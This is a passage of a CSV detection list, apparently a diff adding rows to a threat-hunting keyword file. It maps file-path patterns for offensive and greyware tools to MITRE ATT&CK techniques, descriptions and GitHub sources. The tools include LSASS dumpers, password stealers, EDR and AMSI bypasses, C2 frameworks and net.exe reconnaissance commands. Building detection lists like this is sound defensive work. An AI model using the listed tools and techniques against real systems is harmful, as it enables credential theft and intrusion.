pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*\Mockingjay_BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z"
+"*\modifiableautorun.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*\monkey.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*\monkey32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*\monkey64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*\ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z"
+"*\msi_search.c*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.exe*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.ps1*","offensive_tool_keyword","msi-search","This tool 
simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.x64.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.x86.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\MSOL\DomainCompanyInfo.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*\mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
+"*\nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*\nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\net*\ftpagent.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z"
+"*\net.exe"" 
accounts*","greyware_tool_keyword","net","Enumerate local accounts","T1087.001 - T1003","TA0007 - TA0009","N/A","N/A","discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\net.exe* localgroup admin*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A"
+"*\net.exe* sessions*","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A"
+"*\net.exe* view */domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*\net1 sessions*","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A"
+"*\netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\netexec.yml*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NetExec-main\*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NetLoader.exe*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*\netscan.exe*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*\netscan.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*\netscan.lic*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*\netscan.xml*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*\netscan_linux.tar.gz*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*\netscan_portable.zip*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*\netscan_portable\*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*\netscan_setup.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan 
ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\NimBlackout*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*\NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*\Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*\nmap.exe*/24*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. 
and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\nopac.exe*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*\nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NoPowerShell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell 
script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.c*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*\ntdlol.txt*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*\ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\NTLMRelay2Self*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*\ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*\ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" 
+"*\NtRemoteLoad.sln*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\NtRights\*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*\nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\nxc\parsers\ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\nxc\parsers\nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\obfy-1.0.zip*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*\OffensiveCSharp\*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\out_pe.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*\padre\pkg\exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*\papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*\papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - 
